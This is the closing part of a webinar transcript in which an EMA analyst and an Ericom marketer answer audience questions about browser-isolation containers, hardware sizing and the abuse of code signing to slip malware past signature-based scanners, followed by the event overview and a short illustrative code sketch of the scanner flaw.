So, whether there was ransomware inside or not, we don’t really care because you are protected. What we do is we’re going to render the images and you’re going to get a normal browsing experience. And if it’s a bad website trying to do something, then probably nothing is going to show. But you’re not going to be affected – we’re not trying to go backwards and say, "Oh, okay, maybe it was NotPetya." We don’t care because at this point in time, we already exterminated the ransomware and eliminated the container altogether, so this ransomware doesn’t exist anymore – the container is gone and, with it, the operating system.

RG: OK, thank you for that information. Another question, Daniel, that came in is, "How much extra resource would a server need to support multiple instances of the virtual container?"

DM: So obviously the solution requires some hardware. We have a management server and we have a browsing farm. And depending on the number of users – we have a little tool to help you do the math – we can have many hundreds of users browsing on one single server. We actually do a lot of work in the background to optimize the browsing, making sure every active browsing session is maximized, while browsing sessions that are happening in the background get fewer resources. So, we’re really able to maximize the computing power that you have. You still need to have, as I said, a management server and a browsing farm, and multiply the browsing farm according to the number of users. There are also issues of redundancy, but it’s not a huge investment in terms of hardware, not at all.

RG: Good to know, thank you. Steve, jumping over to you. "I’ve heard there’s been an increase in malicious code signing. What exactly is that?"

SB: Code signing, oh my goodness. Yes, that actually is a trend that we’ve been seeing as well and I think it’s actually another great example of how signature-based malware protection solutions can be exploited.

So basically, trusted software developers sign their code with a digital signature that’s granted to them by a third-party certification authority. Signature-based malware scanners actually skip programs that carry these signatures, because they automatically assume that they’re trustworthy applications; that reduces the scanning time because the scanner doesn’t have to check every application, just the ones without a signature. But a certification authority actually has no way of telling the difference between a trustworthy software developer and a malicious one. So, a lot of bad software is falling through the cracks here.
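
The flaw Steve describes reduces to a few lines of scanner logic. This is an illustrative sketch, with hypothetical stand-ins for the signature check and the content scan:

```python
def is_validly_signed(path: str) -> bool:
    """Hypothetical stand-in for verifying a binary's certificate chain."""
    return path.endswith(".signed")  # placeholder for a real signature check

def scan_for_malware(path: str) -> bool:
    """Hypothetical stand-in for a full signature/content scan."""
    return "malware" in path         # placeholder

def scan(path: str) -> bool:
    """Return True if the file is flagged as malicious."""
    # The optimization described above: signed code is assumed trustworthy
    # and skipped entirely to save scan time.
    if is_validly_signed(path):
        return False  # FLAW: a valid signature proves identity, not intent;
                      # malware signed with a purchased certificate sails through.
    return scan_for_malware(path)

print(scan("malware_dropper.signed"))  # False: skipped because it is "signed"
```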

Now, this is particularly used to distribute adware today. But there’s really no reason it can’t be used for more insidious purposes in organizations that are relying on signature-based security solutions – like distributing ransomware or something. The very fact that the malware scanning solution is not filtering those out means that security is being bypassed. And again, I think this is a great example of how doing something more proactive – closing the front door, that is, actually [blocking] this code from entering the business in the first place – is going to prevent the problem from happening, rather than reactively trying to scan and identify these things after the fact.

RG: Thank you, Steve. Let’s take one final question before we hit the top of the hour. Concluding with you, Daniel, "I understand that browsing is done in a container, but can’t the container be infected as well?"

DM: As I mentioned, the containers themselves are all hardened containers, hardened Linux containers, sitting in the DMZ or in the cloud, and their life span is very short. That means that at the end of the session or shortly after, the containers are actually being terminated, therefore eliminating any persistency [of any malware] that potentially may be in the container. So although nothing is 100 percent, and we’ve all been in security long enough to know that nothing is 100 percent, still containers are regarded as a pretty safe mechanism so far. We’ve hardened them, we’ve eliminated many services that are not required for browsing. So we have containers that are very focused just for browsing.

For example, Steve was mentioning cryptojacking. Our containers are very, I would say, slim in resources. They can do the browsing and not much more; that’s how we build them. So using those containers and eliminating them right after really makes sure that everything is safe in the system.

RG: Great, thank you. I wanted to thank our audience for taking time out of your schedule to join us. We love to get attendees at our live events and I hope that you’ll check out the follow-up email that EMA will be sending out later today. It’s going to include resources from today’s event. I hope that we see you at a future webinar. Thanks again for joining us and enjoy the rest of your day.


OVERVIEW


Today’s workforces consider web-based resources and applications to be indispensable business tools, and expect access to these resources to be straightforward and always available. Unfortunately, browsers are also primary threat vectors for ransomware, phishing, malvertising, drive-by downloads and other cyber threats.

Classic detect-and-block security offerings, such as anti-virus and URL filtering, are simply unable to cope with the rapid evolution and proliferation of attack signatures and patterns to which the average web browser is exposed on a daily basis. IT and security staff find themselves constantly struggling to tighten their defenses against malicious exploits and cyber-attacks, on the one hand, while facilitating transparent access to browser-based resources, on the other hand.

In this webinar, EMA Research Director, Steve Brasen, and Ericom Director of Product Marketing, Daniel Miller, present actionable information on upgrading your organization’s defense-in-depth strategy to better protect organizational systems from the evolving threat landscape, without adding friction to end user experiences.


